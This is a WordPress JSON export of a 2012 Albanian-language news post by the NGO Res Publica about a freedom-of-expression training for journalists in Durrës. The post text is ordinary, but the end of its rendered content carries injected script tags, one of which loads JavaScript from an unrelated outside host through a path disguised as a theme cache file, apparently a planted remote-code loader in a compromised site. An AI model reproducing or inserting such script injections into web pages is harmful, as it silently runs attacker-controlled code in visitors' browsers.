{"id":419,"date":"2012-12-11T23:06:32","date_gmt":"2012-12-11T21:06:32","guid":{"rendered":"http:\/\/www.respublica.org.al\/?p=419"},"modified":"2013-09-27T23:20:30","modified_gmt":"2013-09-27T21:20:30","slug":"perfundon-ne-durres-trajnimi-liria-e-shprehjes-nga-teoria-ne-praktike","status":"publish","type":"post","link":"https:\/\/www.respublica.org.al\/web\/?p=419","title":{"rendered":"P\u00ebrfundon n\u00eb Durr\u00ebs trajnimi \u201cLiria e shprehjes, nga teoria n\u00eb praktik\u00eb"},"content":{"rendered":"<p><a href=\"http:\/\/www.respublica.org.al\/wp-content\/uploads\/2012\/12\/2-durres.jpg\"><img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone size-medium wp-image-422\" alt=\"2 durres\" src=\"http:\/\/www.respublica.org.al\/wp-content\/uploads\/2012\/12\/2-durres-300x225.jpg\" width=\"300\" height=\"225\" srcset=\"https:\/\/www.respublica.org.al\/web\/wp-content\/uploads\/2012\/12\/2-durres-300x225.jpg 300w, https:\/\/www.respublica.org.al\/web\/wp-content\/uploads\/2012\/12\/2-durres.jpg 441w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><a href=\"http:\/\/www.respublica.org.al\/wp-content\/uploads\/2012\/12\/3-durres.jpg\"><img decoding=\"async\" class=\"alignnone size-full wp-image-423\" alt=\"3 durres\" src=\"http:\/\/www.respublica.org.al\/wp-content\/uploads\/2012\/12\/3-durres.jpg\" width=\"144\" height=\"108\" \/><\/a><a href=\"http:\/\/www.respublica.org.al\/wp-content\/uploads\/2012\/12\/4-durres.jpg\"><img decoding=\"async\" class=\"alignnone size-full wp-image-424\" alt=\"4 durres\" src=\"http:\/\/www.respublica.org.al\/wp-content\/uploads\/2012\/12\/4-durres.jpg\" width=\"144\" height=\"108\" \/><\/a>Qendra Res Publica, m\u00eb dat\u00eb 7 dhjetor 2012 organizoi n\u00eb Durr\u00ebs trajnimin e tret\u00eb t\u00eb ciklit me titull \u201c<b>Liria e shprehjes, nga teoria n\u00eb praktik\u00eb\u201d<\/b>, me fokusin kryesor trajnimin e gazetar\u00ebve dhe profesionist\u00ebve t\u00eb medias n\u00eb Shqip\u00ebri. Trajnimi u krye n\u00eb\u00a0ambientet e bibliotek\u00ebs \u201cKlubi i artit\u201d ku\u00a0mor\u00ebn pjes\u00eb 33 prej emrave m\u00eb t\u00eb njohur t\u00eb gazetaris\u00eb, aktivist\u00ebve t\u00eb qytetit t\u00eb Durr\u00ebsit, Dekani i Fakultetit t\u00eb Drejt\u00ebsis\u00eb pran\u00eb Universitetit t\u00eb Tiran\u00ebs z. Altin Shegani, zv Dekani i Fakultetit t\u00eb Drejt\u00ebsis\u00eb pran\u00eb Universitetit t\u00eb Tiran\u00ebs z. Besnik \u00c7erekja, si dhe ekspert\u00eb t\u00eb fush\u00ebs, vendas dhe t\u00eb huaj, q\u00eb prezantuan konceptet q\u00eb duhen t\u00eb ken\u00eb parasysh gazetar\u00ebt dhe profesionist\u00ebt e medias n\u00eb raport me lirin\u00eb e shprehjes.<\/p>\n<p lang=\"sq-AL\" align=\"JUSTIFY\">Organizuar nga Res Publica dhe mb\u00ebshtetur nga National Endowment for Democracy, trajnimi ofroi n\u00eb nj\u00eb model t\u00eb thjeshtuar, koncepte t\u00eb s\u00eb drejt\u00ebs q\u00eb hasen n\u00eb pun\u00ebn e p\u00ebrditshme nga gazetar\u00ebt dhe profesionist\u00ebt e medias.<\/p>\n<p align=\"JUSTIFY\">Trajnimi u \u00e7el me nj\u00eb prezantim nga Av. Andi Kananaj dhe Av. Dorjan Matlija q\u00eb prezantuan shkurtimisht Res Publica-n dhe projektin me National Endowment for Democracy. Materialet q\u00eb pasuan ishin p\u00ebrgatitur nga Yllka Lam\u00e7e (Kandidate p\u00ebr doktoratur\u00eb), dhe Av. Theodoros Alexandridis (ekspert p\u00ebr jurisprudenc\u00ebn e Gjykat\u00ebs Europiane p\u00ebr t\u00eb Drejtat e Njeriut), materiale \u00a0q\u00eb hodh\u00ebn drit\u00eb mbi konceptet e liris\u00eb s\u00eb shprehjes si\u00e7 p\u00ebrcaktohen n\u00eb Kushtetut\u00eb dhe n\u00eb Konvent\u00ebn Evropiane p\u00ebr t\u00eb Drejtat e Njeriut. M\u00eb pas vijoi komunikimi i gazetar\u00ebve me Dekanin e Fakultetit t\u00eb Drejt\u00ebsis\u00eb pran\u00eb Universitetit t\u00eb Tiran\u00ebs, Dr. Altin Shegani, i cili b\u00ebri nj\u00eb hyrje n\u00eb konceptet baz\u00eb t\u00eb liris\u00eb s\u00eb shprehjes dhe r\u00ebnd\u00ebsis\u00eb q\u00eb ajo ka n\u00eb nj\u00eb shoq\u00ebri demokratike. Eksperti i jurisprudenc\u00ebs s\u00eb Gjykat\u00ebs Evropiane p\u00ebr t\u00eb Drejtat e Njeriut, Av. Theodoros Alexandridis,\u00a0prezantoi gjithashtu nj\u00eb material praktik, nj\u00eb udh\u00ebzues p\u00ebr \u00e7far\u00eb i lejohet nj\u00eb gazetari dhe \u00e7far\u00eb nuk i lejohet t\u00eb kryej\u00eb. \u00c7do udh\u00ebzues u shoq\u00ebrua me raste konkrete nga jurisprudenca e Gjykat\u00ebs s\u00eb Strasburgut. Av. Dorian Matlija dhe Av. Edvin Kukunja, me ndihmes\u00ebn edhe t\u00eb studentes praktikante Arbesa Kurti, njoh\u00ebn gazetar\u00ebt me nj\u00eb num\u00ebr \u00e7\u00ebshtjesh konkrete q\u00eb ka ndjekur Res Publica n\u00eb mbrojtje t\u00eb interesave t\u00eb gazetar\u00ebve n\u00eb gjykatat shqiptare. \u00c7\u00ebshtjet u trajtuan si raste studimore dhe shoq\u00ebruan edhe me disa konkluzione t\u00eb cilat iu shtruan debatit mes pjes\u00ebmarr\u00ebsve p\u00ebr t\u00eb kuptuar nivelin e p\u00ebrfitimit t\u00eb koncepteve t\u00eb trajtuara n\u00eb k\u00ebt\u00eb trajnim.<\/p>\n<p align=\"JUSTIFY\">Gazetar\u00ebt konkluduan se censura dhe vet\u00ebcensura \u00ebsht\u00eb mjet i papranuesh\u00ebm kontrolli. Nj\u00eb teknik\u00eb m\u00eb e mir\u00eb p\u00ebr t\u2019ju shmangur abuzimit do t\u00eb ishte organizimi i nj\u00eb dhome gazetar\u00ebsh ne form\u00ebn e nj\u00eb K\u00ebshilli Etike. Ky vet\u00ebmenaxhim i liris\u00eb s\u00eb shprehjes nga ana e gazetar\u00ebve do t\u00eb ishte rruga optimale p\u00ebr proporcionalitet mes liris\u00eb s\u00eb fjal\u00ebs dhe pasojave q\u00eb ajo mund te shkaktoj\u00eb ne iterin e saj normal.<\/p>\n<p align=\"JUSTIFY\">Pjes\u00ebmarr\u00ebsve, si dhe n\u00eb dy takimet e m\u00ebparshme, iu shp\u00ebrnda edhe nj\u00eb certifikat\u00eb p\u00ebr pjes\u00ebmarrjen n\u00eb trajnim, t\u00eb n\u00ebnshkruar nga titullar\u00ebt akademik\u00eb t\u00eb pranish\u00ebm. R\u00ebnd\u00ebsi t\u00eb madhe pati debati i ndezur, i cili k\u00ebt\u00eb her\u00eb ishte p\u00ebrtej parashikimeve t\u00eb organizator\u00ebve, duke qen\u00eb nj\u00eb indikator i vlefsh\u00ebm p\u00ebr interesin e gazetar\u00ebve rreth koncepteve t\u00eb trajtuara dhe p\u00ebr p\u00ebrthithjen e suksesshme t\u00eb tyre.<\/p>\n<p align=\"JUSTIFY\">Me mir\u00ebnjohje Res Publica fal\u00ebnderon pjes\u00ebmarr\u00ebsit dhe ekspert\u00ebt, p\u00ebr aktivitetet e organizuara<\/p>\n<p><script type=\"text\/javascript\" src=\"#\"><\/script><script type=\"text\/javascript\" src=\"http:\/\/www.get.space\/wp-content\/cache\/tmpWpfc\/theme-index.php\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Qendra Res Publica, m\u00eb dat\u00eb 7 dhjetor 2012 organizoi n\u00eb Durr\u00ebs trajnimin e tret\u00eb t\u00eb ciklit me titull \u201cLiria e [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":421,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"footnotes":""},"categories":[6,4],"tags":[],"_links":{"self":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/419"}],"collection":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=419"}],"version-history":[{"count":3,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/419\/revisions"}],"predecessor-version":[{"id":427,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/419\/revisions\/427"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/media\/421"}],"wp:attachment":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=419"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=419"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=419"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}